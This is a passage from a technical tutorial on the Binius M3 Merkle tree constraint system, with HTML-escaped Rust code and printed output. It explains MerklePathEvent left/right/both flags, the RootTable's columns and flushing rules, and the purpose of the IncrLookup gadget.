&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    witness.fill_table_parallel(&amp;amp;self.merkle_path_table_left, &amp;amp;left_events)?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    witness.fill_table_parallel(&amp;amp;self.merkle_path_table_right, &amp;amp;right_events)?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    witness.fill_table_parallel(&amp;amp;self.merkle_path_table_both, &amp;amp;both_events)?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;*...*&#x2F;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;This should print the left events first:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Left events: [&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    MerklePathEvent { &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        root_id: 0, &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        left: [67, 45, 38, 237, 191, 26, 225, 172, 10, 94, 207, 176, 214, 146, 204, 230, 180, 241, 18, 217, 51, 18, 215, 92, 201, 50, 136, 22, 3, 172, 197, 55], &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        right: [44, 37, 79, 124, 156, 84, 213, 102, 239, 101, 1, 89, 211, 73, 117, 58, 143, 41, 102, 47, 67, 32, 248, 100, 29, 138, 44, 204, 232, 177, 216, 54], &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        parent: [70, 219, 30, 17, 251, 21, 8, 37, 23, 248, 120, 106, 49, 210, 42, 247, 15, 227, 231, 151, 101, 7, 187, 203, 29, 109, 186, 223, 43, 126, 183, 173], &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        parent_depth: 1, &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        parent_index: 1, &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        flush_left: true, &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        flush_right: false &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }, &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    MerklePathEvent { &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        root_id: 0, &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        left: [118, 35, 234, 226, 120, 82, 64, 185, 61, 18, 177, 106, 102, 216, 22, 16, 124, 220, 140, 137, 199, 16, 143, 255, 32, 149, 225, 141, 223, 239, 137, 134], &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        right: [177, 24, 234, 85, 97, 98, 77, 166, 204, 83, 123, 174, 213, 110, 96, 47, 147, 140, 128, 78, 39, 248, 49, 150, 97, 12, 136, 40, 199, 35, 247, 152], &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        parent: [67, 45, 38, 237, 191, 26, 225, 172, 10, 94, 207, 176, 214, 146, 204, 230, 180, 241, 18, 217, 51, 18, 215, 92, 201, 50, 136, 22, 3, 172, 197, 55], &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        parent_depth: 2, &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        parent_index: 2, &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        flush_left: true, &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        flush_right: false &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;This event is a left one because the node that has to be pulled out from the channel is the left child “67”:&lt;br &#x2F;&gt;
&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;r19SajY7ee.png&quot; alt=&quot;image&quot; &#x2F;&gt;&lt;br &#x2F;&gt;
The same with the second event. Here, the node that has to be pulled is the left child “118”:&lt;br &#x2F;&gt;
&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;HJF1CjYXee.png&quot; alt=&quot;image&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;On the other hand, you should also see the prints of the right events:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Right events: [&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    MerklePathEvent { &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        root_id: 0, &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        left: [114, 238, 165, 17, 148, 16, 151, 58, 227, 40, 173, 146, 145, 98, 104, 18, 142, 219, 71, 16, 110, 26, 214, 168, 195, 213, 69, 132, 155, 138, 184, 27], &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        right: [16, 24, 93, 38, 2, 59, 54, 16, 206, 183, 217, 245, 125, 73, 210, 179, 135, 99, 161, 43, 43, 189, 250, 147, 39, 90, 255, 24, 42, 251, 149, 220], &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        parent: [181, 157, 35, 221, 161, 240, 65, 205, 125, 210, 142, 58, 147, 55, 148, 56, 221, 206, 216, 118, 104, 90, 130, 87, 219, 62, 104, 251, 27, 201, 113, 211], &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        parent_depth: 2, &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        parent_index: 1, &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        flush_left: false, &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        flush_right: true &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }, &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    MerklePathEvent { &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        root_id: 0, &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        left: [246, 247, 101, 36, 57, 192, 24, 48, 162, 208, 160, 30, 187, 154, 180, 176, 208, 104, 135, 216, 175, 8, 0, 249, 96, 50, 194, 72, 102, 219, 184, 27], &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        right: [181, 157, 35, 221, 161, 240, 65, 205, 125, 210, 142, 58, 147, 55, 148, 56, 221, 206, 216, 118, 104, 90, 130, 87, 219, 62, 104, 251, 27, 201, 113, 211], &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        parent: [124, 166, 97, 100, 173, 242, 98, 95, 141, 158, 147, 144, 202, 239, 150, 192, 0, 99, 9, 138, 61, 19, 65, 163, 160, 4, 227, 66, 233, 115, 199, 3], &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        parent_depth: 1, &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        parent_index: 0, &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        flush_left: false, &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        flush_right: true &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;In these cases the nodes that have to be pulled are the right children:&lt;br &#x2F;&gt;
&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;S19_AiY7ge.png&quot; alt=&quot;image&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;ByT3DLk4gg.png&quot; alt=&quot;image&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Finally, you’ll find a print of an event that is both left and right:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Both events: [&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    MerklePathEvent { &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        root_id: 0, &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        left: [124, 166, 97, 100, 173, 242, 98, 95, 141, 158, 147, 144, 202, 239, 150, 192, 0, 99, 9, 138, 61, 19, 65, 163, 160, 4, 227, 66, 233, 115, 199, 3], &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        right: [70, 219, 30, 17, 251, 21, 8, 37, 23, 248, 120, 106, 49, 210, 42, 247, 15, 227, 231, 151, 101, 7, 187, 203, 29, 109, 186, 223, 43, 126, 183, 173], &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        parent: [193, 178, 67, 64, 61, 105, 200, 119, 129, 200, 250, 91, 108, 49, 178, 161, 234, 142, 150, 145, 206, 128, 43, 153, 216, 191, 196, 183, 198, 179, 118, 122], &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        parent_depth: 0, &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        parent_index: 0, &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        flush_left: true, &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        flush_right: true &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;In this case, if you are looking at the blue path, the right child node “70” has to be pulled, but if you are looking at the green path, the left child “124” has to be pulled. That’s why this event is both left and right:&lt;br &#x2F;&gt;
&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;SJV1r2tmxx.png&quot; alt=&quot;image&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
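&lt;p&gt;The flags in these events can be reproduced with a small computation. Assuming the two proven leaves sit at indices 4 and 3 of the depth-3 tree (which matches the printed events above), each path node is pulled as the left or right child of its parent according to the parity of its index, and a parent event pulled from both sides across paths becomes a “both” event. A simplified sketch, ignoring hashes and node contents:&lt;&#x2F;p&gt;

```rust
use std::collections::BTreeMap;

// For each parent event keyed by (parent_depth, parent_index), record
// which children the paths pull: (flush_left, flush_right).
fn path_flags(leaves: &[usize], depth: usize) -> BTreeMap<(usize, usize), (bool, bool)> {
    let mut events = BTreeMap::new();
    for &leaf in leaves {
        let mut idx = leaf;
        // Walk from the leaf up to the root.
        for d in (1..=depth).rev() {
            let parent = (d - 1, idx / 2);
            let e = events.entry(parent).or_insert((false, false));
            // An even index is a left child, an odd index a right child.
            if idx % 2 == 0 { e.0 = true } else { e.1 = true }
            idx /= 2;
        }
    }
    events
}

fn main() {
    // Leaves 4 and 3 reproduce the five printed events of the example.
    let events = path_flags(&[4, 3], 3);
    assert_eq!(events[&(0, 0)], (true, true));  // the "both" event
    assert_eq!(events[&(1, 1)], (true, false)); // left event
    assert_eq!(events[&(2, 2)], (true, false)); // left event
    assert_eq!(events[&(1, 0)], (false, true)); // right event
    assert_eq!(events[&(2, 1)], (false, true)); // right event
    println!("{events:?}");
}
```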
&lt;h2 id=&quot;roottable&quot;&gt;RootTable&lt;&#x2F;h2&gt;
&lt;h3 id=&quot;purpose-1&quot;&gt;Purpose&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;code&gt;RootTable&lt;&#x2F;code&gt; is a table within the Binius Merkle Tree constraint system that is responsible for reconciling the final values of Merkle paths with the declared Merkle roots. While &lt;code&gt;NodesTable&lt;&#x2F;code&gt; verifies the steps along a path, &lt;code&gt;RootTable&lt;&#x2F;code&gt; provides the ultimate cryptographic guarantee that these paths lead to the correct, pre-committed Merkle roots.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;content&quot;&gt;Content&lt;&#x2F;h3&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub struct RootTable {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pub id: TableId,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pub root_id: Col&amp;lt;B8&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pub digest: [Col&amp;lt;B32&amp;gt;; 8]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;This table contains the data of the root nodes (the ID and the digest, i.e., the content) of all the trees we are analyzing, since we can prove different paths for different trees.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;initialization-2&quot;&gt;Initialization&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;code&gt;RootTable&lt;&#x2F;code&gt; initialization is done by its method &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;IrreducibleOSS&#x2F;binius&#x2F;blob&#x2F;main&#x2F;crates&#x2F;m3&#x2F;src&#x2F;gadgets&#x2F;merkle_tree&#x2F;mod.rs#L469&quot;&gt;new()&lt;&#x2F;a&gt;:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;impl RootTable {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pub fn new(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        cs: &amp;amp;mut ConstraintSystem,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        nodes_channel: ChannelId,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        roots_channel: ChannelId,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    ) -&amp;gt; Self {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &#x2F;*...*&#x2F;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;This function:&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;Adds a table to the &lt;code&gt;cs&lt;&#x2F;code&gt;:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let mut table = cs.add_table(&amp;quot;merkle_tree_roots&amp;quot;);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;&#x2F;li&gt;
&lt;li&gt;
&lt;p&gt;Defines columns within that table (committed and&#x2F;or virtual):&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let root_id = table.add_committed(&amp;quot;root_id&amp;quot;);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let digest = table.add_committed_multiple(&amp;quot;digest&amp;quot;);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let zero = table.add_constant(&amp;quot;zero&amp;quot;, [B32::ZERO]);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;&#x2F;li&gt;
&lt;li&gt;
&lt;p&gt;Adds the flushing rules associated with that table and its channels (&lt;code&gt;nodes_channel&lt;&#x2F;code&gt; and &lt;code&gt;roots_channel&lt;&#x2F;code&gt;):&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;table.pull(roots_channel_id, to_root_flush(root_id_upcasted, digest));&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let mut nodes_channel = NodesChannel::new(&amp;amp;mut table, nodes_channel_id);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;nodes_channel.pull(root_id_upcasted, digest, zero, zero);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;&lt;h3 id=&quot;flushing-rules&quot;&gt;Flushing Rules&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;code&gt;RootTable&lt;&#x2F;code&gt; primarily interacts with the &lt;code&gt;nodes_channel&lt;&#x2F;code&gt; and &lt;code&gt;roots_channel&lt;&#x2F;code&gt; to perform its reconciliation. It will &lt;code&gt;pull&lt;&#x2F;code&gt; data from both channels to verify consistency.&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;nodes_channel&lt;&#x2F;code&gt;&lt;&#x2F;strong&gt;: This channel carries information about all intermediate and final nodes of the Merkle paths. &lt;code&gt;RootTable&lt;&#x2F;code&gt; will &lt;code&gt;pull&lt;&#x2F;code&gt; the digest of the final node of a path from this channel.&lt;&#x2F;li&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;roots_channel&lt;&#x2F;code&gt;&lt;&#x2F;strong&gt;: This channel contains the actual Merkle roots that are being proven against. &lt;code&gt;RootTable&lt;&#x2F;code&gt; will &lt;code&gt;pull&lt;&#x2F;code&gt; these values to ensure that the path’s end-point matches one of the valid roots.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;The flushing rules ensure that the necessary data (final path node digests and declared root digests) is available to the &lt;code&gt;RootTable&lt;&#x2F;code&gt; for its internal consistency checks. This comparison forms the core of the root-verification constraint, ensuring that the Merkle path indeed leads to the claimed root.&lt;&#x2F;p&gt;
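&lt;p&gt;Under the hood, this push&#x2F;pull reconciliation is a multiset balance check: the constraint system accepts only if every value pushed to a channel is pulled exactly the same number of times. A toy model of this idea (plain Rust, not the Binius API; in this sketch the leaf under proof is supplied as a boundary push):&lt;&#x2F;p&gt;

```rust
use std::collections::HashMap;

// Toy model of an M3 channel: tables push and pull items, and the
// system is satisfied only if pushes and pulls cancel exactly.
#[derive(Default)]
struct Channel {
    counts: HashMap<&'static str, i64>,
}

impl Channel {
    fn push(&mut self, item: &'static str) {
        *self.counts.entry(item).or_insert(0) += 1;
    }
    fn pull(&mut self, item: &'static str) {
        *self.counts.entry(item).or_insert(0) -= 1;
    }
    fn balanced(&self) -> bool {
        self.counts.values().all(|&c| c == 0)
    }
}

fn main() {
    let mut nodes = Channel::default();
    // Boundary: the leaf under proof enters the channel.
    nodes.push("leaf");
    // NodesTable rows: push the parent, pull the child on the path.
    nodes.push("mid");
    nodes.pull("leaf");
    nodes.push("root");
    nodes.pull("mid");
    // RootTable: pulls the claimed root, closing the cycle.
    nodes.pull("root");
    assert!(nodes.balanced());

    // A path ending in the wrong root leaves the channel unbalanced.
    let mut bad = Channel::default();
    bad.push("root");
    bad.pull("wrong_root");
    assert!(!bad.balanced());
    println!("ok");
}
```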
&lt;h2 id=&quot;incrlookup&quot;&gt;IncrLookup&lt;&#x2F;h2&gt;
&lt;h3 id=&quot;purpose-2&quot;&gt;Purpose&lt;&#x2F;h3&gt;
&lt;p&gt;Beyond &lt;code&gt;NodesTable&lt;&#x2F;code&gt; and &lt;code&gt;RootTable&lt;&#x2F;code&gt;, the Binius Merkle Tree constraint system also utilizes &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;IrreducibleOSS&#x2F;binius&#x2F;blob&#x2F;main&#x2F;crates&#x2F;m3&#x2F;src&#x2F;gadgets&#x2F;indexed_lookup&#x2F;incr.rs#L161&quot;&gt;IncrLookup&lt;&#x2F;a&gt;. This is a specialized gadget designed to efficiently verify 8-bit increment operations with a carry bit. Instead of writing complex arithmetic constraints for each instance of an increment operation, &lt;code&gt;IncrLookup&lt;&#x2F;code&gt; allows the prover to simply demonstrate that each operation performed is present in a pre-defined table of all valid increment results. This significantly reduces the computational cost and proof size.&lt;&#x2F;p&gt;
&lt;p&gt;In the specific context of Merkle tree inclusion proofs, &lt;code&gt;IncrLookup&lt;&#x2F;code&gt; is used to ensure that in each &lt;code&gt;MerklePathEvent&lt;&#x2F;code&gt;, the child’s depth is exactly one greater than the parent’s depth.&lt;&#x2F;p&gt;
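&lt;p&gt;A minimal model of the lookup idea in plain Rust (hypothetical encoding, not the exact Binius layout): build the full table of 8-bit increment-with-carry results once, then validate each claimed operation by table membership instead of re-proving its arithmetic. Here an entry index packs the 8-bit input in its low bits and a carry-in flag in bit 8.&lt;&#x2F;p&gt;

```rust
// Build the table of all 512 valid increment-with-carry results.
// Entry i stores (output, carry_out) of `input + carry_in`, where
// input = i & 0xFF and carry_in = bit 8 of i.
fn build_incr_table() -> Vec<(u8, bool)> {
    (0u16..512)
        .map(|i| {
            let input = i & 0xFF;
            let carry_in = (i >> 8) & 1;
            let sum = input + carry_in;
            ((sum & 0xFF) as u8, sum > 0xFF)
        })
        .collect()
}

// The prover claims `(input, carry_in) -> (output, carry_out)`; the
// claim is checked with a single table lookup rather than an
// arithmetic constraint per operation.
fn check_incr(table: &[(u8, bool)], input: u8, carry_in: bool, output: u8, carry_out: bool) -> bool {
    let idx = (input as usize) | ((carry_in as usize) << 8);
    table[idx] == (output, carry_out)
}

fn main() {
    let table = build_incr_table();
    assert_eq!(table.len(), 512);
    assert!(check_incr(&table, 41, true, 42, false)); // 41 + 1 = 42
    assert!(check_incr(&table, 255, true, 0, true));  // wraps, carry-out set
    assert!(check_incr(&table, 7, false, 7, false));  // carry-in 0: unchanged
    assert!(!check_incr(&table, 41, true, 43, false)); // wrong claim rejected
    println!("ok");
}
```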
&lt;h3 id=&quot;content-1&quot;&gt;Content&lt;&#x2F;h3&gt;
&lt;p&gt;The &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;IrreducibleOSS&#x2F;binius&#x2F;blob&#x2F;main&#x2F;crates&#x2F;m3&#x2F;src&#x2F;gadgets&#x2F;indexed_lookup&#x2F;incr.rs#L161&quot;&gt;IncrLookup&lt;&#x2F;a&gt; table has only two columns, &lt;code&gt;entries_ordered&lt;&#x2F;code&gt; and &lt;code&gt;entries_sorted&lt;&#x2F;code&gt;. Both columns hold exactly the same values, arranged in different orders. We’ll see how these columns are filled later on.&lt;&#x2F;p&gt;
&lt;p&gt;The struct &lt;code&gt;IncrLookup&lt;&#x2F;code&gt; has one more field &lt;code&gt;lookup_producer&lt;&#x2F;code&gt;. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;IrreducibleOSS&#x2F;binius&#x2F;blob&#x2F;main&#x2F;crates&#x2F;m3&#x2F;src&#x2F;gadgets&#x2F;lookup.rs#L16&quot;&gt;LookupProducer&lt;&#x2F;a&gt; is the gadget in charge of creating the lookup table.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;initialization-3&quot;&gt;Initialization&lt;&#x2F;h3&gt;
